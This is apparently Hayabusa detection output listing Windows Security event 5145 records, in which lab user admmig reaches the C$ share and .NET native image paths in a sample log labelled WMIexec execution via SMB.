2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
